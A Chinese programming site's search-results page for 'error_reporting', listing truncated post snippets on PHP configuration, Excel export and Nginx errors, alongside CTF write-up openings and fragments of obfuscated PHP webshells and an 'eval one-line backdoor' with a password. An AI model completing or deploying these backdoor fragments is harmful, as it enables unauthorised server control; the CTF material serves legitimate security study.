码迷,mamicode.com
首页 >  
搜索关键字:error_reporting    ( 208个结果
任意文件读取 move_uploaded_file文件上传
任意文件读取 move_uploaded_file文件上传 <?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."e ...
分类:Web程序   时间:2020-05-15 15:27:12    阅读次数:75
evalPHP一句话后门
evalPHP一句话后门 <?php $password='c2.o'; $shellname='BY:FBI'; $myurl='http://www.baidu.com'; error_reporting(E_ERROR | E_PARSE);@set_time_limit(0); ob_sta ...
分类:Web程序   时间:2020-05-15 13:23:16    阅读次数:242
[BJDCTF2020]ZJCTF,不过如此
知识点 php://input filter伪协议 preg_replace() /e模式命令执行题目源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g ...
分类:其他好文   时间:2020-05-14 23:57:50    阅读次数:167
PHPexcel导出赋值
/*导出excel*/ public function download(){ error_reporting(E_ALL); date_default_timezone_set('Asia/Shanghai'); ini_set('memory_limit','300M'); set_time_l ...
分类:Web程序   时间:2020-05-09 11:55:30    阅读次数:82
PHP的常见配置项
一、简介 PHP的配置项可以在配置文件php.ini中配置,也可以在脚本中使用ini_set()函数临时配置。 二、常用配置项 1、错误信息相关配置 1)display_errors 设定PHP是否将任何错误信息包含在返回给Web服务器的数据流中。(PHP将任何由error_reporting所定义 ...
分类:Web程序   时间:2020-05-03 10:50:25    阅读次数:75
Nginx 提示500 ,设置提示具体错误
在入口文件index.php设置 error_reporting(E_ALL); ini_set('display_errors', 'On'); ...
分类:其他好文   时间:2020-05-02 10:13:38    阅读次数:63
[BUUOJ记录] [CISCN 2019 初赛]Love Math
主要考察利用已有函数构造危险函数绕过,实现RCE。 进入题目给出源码: <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c= ...
分类:其他好文   时间:2020-04-10 00:27:31    阅读次数:150
2.6 Advanced Error Reporting Capability (Optional)
2.6 Advanced Error Reporting Capability (Optional)The Advanced Error Reporting definitions below are based on the PCI Express 2.1 Base specification. ...
分类:其他好文   时间:2020-04-08 16:08:10    阅读次数:88
[BJDCTF2020]ZJCTF,不过如此
题目给了源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r') "I have a dream")){ echo ...
分类:其他好文   时间:2020-03-15 20:23:49    阅读次数:98
Bugku-flag.php
关于这道题,没有提示的话是做不了的 提示:hint,那么去试试在url里传个hint http://123.206.87.240:8002/flagphp/?hint=0 显示同一网页上的源码: <?php error_reporting(0); include_once("flag.php"); ...
分类:Web程序   时间:2020-03-02 00:35:20    阅读次数:83
208条   上一页 1 2 3 4 5 ... 21 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!